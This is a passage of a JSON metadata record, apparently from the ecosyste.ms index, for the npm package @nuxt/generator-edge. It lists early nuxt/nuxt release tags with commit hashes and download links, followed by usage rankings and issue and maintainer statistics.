Fnuxt/tags/v0.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.3/manifests"},{"name":"v0.7.2","sha":"4b9fb87c860f69d4b5044533aee0c16310b10aa1","kind":"commit","published_at":"2016-11-24T13:41:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.2/manifests"},{"name":"v0.7.1","sha":"d984c8803d9dd1e58c56a08b97f7d38ba5cb92b7","kind":"commit","published_at":"2016-11-24T12:16:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.1/manifests"},{"name":"v0.7.0","sha":"40515ac91a9e4ae5fd7b4a37c75de2843f6d3fbc","kind":"commit","published_at":"2016-11-24T00:47:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.0/manifests"},{"name":"v0.6.9","sha":"5b35834f42aa6cea3724f098787587a86ec6f4c3","kind":"commit","published_at":"2016-11-23T13:05:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.9/manifests"},{"name":"v0.6.8","sha":"57b55dc5126ae271f3b87b2d3ffdac49055e355e","kind":"commit","published_at":"2016-11-22T23:47:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.8/manifests"},{"name":"v0.6.7","sha":"57b55dc5126ae271f3b87b2d3ffdac49055e355e","kind":"commit","published_at":"2016-11-22T23:47:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.7/manifests"},{"name":"v0.6.6","sha":"fc598ea66e1249645ed3677d8725efc1c048ba2d","kind":"commit","published_at":"2016-11-22T23:27:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.6/manifests"},{"name":"v0.6.5","sha":"2400fabceb3b76b756efc8ede2919a4ccb088345","kind":"commit","published_at":"2016-11-21T18:53:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.5/manifests"},{"name":"v0.6.0","sha":"edd0227e746c2ecde781915bd8c59e98f399439a","kind":"commit","published_at":"2016-11-21T13:15:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.0/manifests"},{"name":"v0.5.3","sha":"b8436b067f8375bb91e4b99cc528661eaa27c43c","kind":"commit","published_at":"2016-11-20T11:23:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.3/manifests"},{"name":"v0.5.2","sha":"b8436b067f8375bb91e4b99cc528661eaa27c43c","kind":"commit","published_at":"2016-11-20T11:23:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.2/manifests"},{"name":"v0.5.1","sha":"8cbbaeaf838e33bb6e23f06e15724b39042c5206","kind":"commit","published_at":"2016-11-20T10:37:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.1/manifests"},{"name":"v0.5.0","sha":"e48f8250a084202fbc492df55f13e3803e2b74cf","kind":"commit","published_at":"2016-11-18T13:45:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.0/manifests"},{"name":"v0.4.9","sha":"d4b8bc4f022459c976b41cb9845be38759a0481a","kind":"commit","published_at":"2016-11-18T09:38:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.9/manifests"},{"name":"v0.4.8","sha":"d928c9e5970e9d08eec61fe6770325d8c74e6d5b","kind":"commit","published_at":"2016-11-18T08:19:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.8/manifests"},{"name":"v0.4.7","sha":"49f67566c2d74a661421be1589279b316dcc9e49","kind":"commit","published_at":"2016-11-17T21:12:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.7/manifests"},{"name":"v0.4.6","sha":"06edc8029b796b8008fe52a682159636d10f3e7a","kind":"commit","published_at":"2016-11-17T13:02:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.6/manifests"},{"name":"v0.4.4","sha":"2677afb46fc4a950d62f32e6172aeaa2fdcc5a8b","kind":"commit","published_at":"2016-11-17T10:57:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.4/manifests"},{"name":"v0.4.3","sha":"a98e6d4e9bda0491bf8f32815701f42f28c793a2","kind":"commit","published_at":"2016-11-16T17:41:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.3/manifests"},{"name":"v0.4.2","sha":"d2c0f01593e669147396ff25c4a017372a8390ea","kind":"commit","published_at":"2016-11-16T17:06:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.2/manifests"},{"name":"v0.4.1","sha":"b1546682ef7ce3f9ead26f328417d2589875ef46","kind":"commit","published_at":"2016-11-16T16:55:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.1/manifests"},{"name":"v0.4.0","sha":"c5c9448a264327adab3920d07937f819f5c0a3c4","kind":"commit","published_at":"2016-11-11T14:30:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.0/manifests"},{"name":"v0.3.8","sha":"4b0b83b782ba2c865722dbd80521ca6aa1d63b4a","kind":"commit","published_at":"2016-11-11T00:35:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"4b0b83b782ba2c865722dbd80521ca6aa1d63b4a","kind":"commit","published_at":"2016-11-11T00:35:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"5b0ff5617b97d050983358879b6a70835d63be8a","kind":"commit","published_at":"2016-11-10T23:01:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"cb7406cba6a42a4009660569c921f7fdca5bb209","kind":"commit","published_at":"2016-11-10T18:34:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"ea1c5dee15ed92add7e8f69bd523cb090161194e","kind":"commit","published_at":"2016-11-10T16:16:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"9f370cb97c98ff40d4ed5c871147f3c441883b7f","kind":"commit","published_at":"2016-11-10T14:09:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"a8776de913a391bfd825b56cbd5ae655d3490240","kind":"commit","published_at":"2016-11-10T13:46:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"c97c4ec32e0b5a889bd3b95f5f18d251db202354","kind":"commit","published_at":"2016-11-10T02:38:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"d88948bdeac9cd3b8c8f1c1456198e666e49664e","kind":"commit","published_at":"2016-11-10T01:19:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.0/manifests"},{"name":"v0.2.6","sha":"18a2b57655a6be21a93949520a663825471fbd48","kind":"commit","published_at":"2016-11-09T22:59:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"a5780a09cae0a0109103bf660da96e479ec5ef73","kind":"commit","published_at":"2016-11-09T14:55:02.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"73bdfc03943799025def2b91f2402208126da453","kind":"commit","published_at":"2016-11-09T01:35:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"90a97d76ce938be645f82f538a268a83b4c9630d","kind":"commit","published_at":"2016-11-08T02:48:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"923b211a929392e7bb77e3e9326655229397ca13","kind":"commit","published_at":"2016-11-08T00:54:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"876054ed48764ef11278c27d1884d94c3153b05d","kind":"commit","published_at":"2016-11-08T00:18:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"9ebbb14eabd73ed64871d0ee59fafaad914e95f2","kind":"commit","published_at":"2016-11-07T22:26:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.0/manifests"}]},"repo_metadata_updated_at":"2026-02-13T18:02:57.376Z","dependent_packages_count":4,"downloads":12343,"downloads_period":"last-month","dependent_repos_count":424,"rankings":{"downloads":1.1109906253686372,"dependent_repos_count":0.8139738529674262,"dependent_packages_count":4.506936399663058,"stargazers_count":0.15564167441745766,"forks_count":0.5232519525968256,"docker_downloads_count":1.8105650152087687,"average":1.4868932533703623},"purl":"pkg:npm/%40nuxt/generator-edge","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@nuxt/generator-edge","docker_dependents_count":1,"docker_downloads_count":8,"usage_url":"https://repos.ecosyste.ms/usage/npm/@nuxt/generator-edge","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@nuxt/generator-edge/dependencies","status":null,"funding_links":["https://opencollective.com/nuxtjs","https://github.com/sponsors/nuxt"],"critical":null,"issue_metadata":{"last_synced_at":"2026-02-13T18:00:30.319Z","issues_count":6007,"pull_requests_count":6866,"avg_time_to_close_issue":11690528.2843204,"avg_time_to_close_pull_request":786776.4495867769,"issues_closed_count":4402,"pull_requests_closed_count":6050,"pull_request_authors_count":588,"issue_authors_count":3402,"avg_comments_per_issue":4.151489928416847,"avg_comments_per_pull_request":2.496213224584911,"merged_pull_requests_count":5386,"bot_issues_count":12,"bot_pull_requests_count":2972,"past_year_issues_count":940,"past_year_pull_requests_count":1678,"past_year_avg_time_to_close_issue":711939.6998050682,"past_year_avg_time_to_close_pull_request":221172.79485238457,"past_year_issues_closed_count":513,"past_year_pull_requests_closed_count":1321,"past_year_pull_request_authors_count":141,"past_year_issue_authors_count":674,"past_year_avg_comments_per_issue":2.2457446808510637,"past_year_avg_comments_per_pull_request":3.4153754469606676,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":694,"past_year_merged_pull_requests_count":1175,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/issues","maintainers":[{"login":"danielroe","count":1324,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":364,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"DamianGlowala","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"pi0","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"Mini-ghost","count":91,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"manniL","count":76,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"BobbieGoede","count":70,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"antfu","count":63,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"userquin","count":50,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"cernymatej","count":44,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"TheAlexLichter","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"OrbisK","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"wattanx","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"Atinux","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"ineshbose","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"atinux","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"productdevbook","count":16,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"dargmuesli","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"Hebilicious","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"warflash","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"lihbr","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"madebyfabian","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"HugoRCD","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"posva","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"},{"login":"clarkdo","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/clarkdo"},{"login":"farnabaz","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/farnabaz"},{"login":"arashsheyda","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arash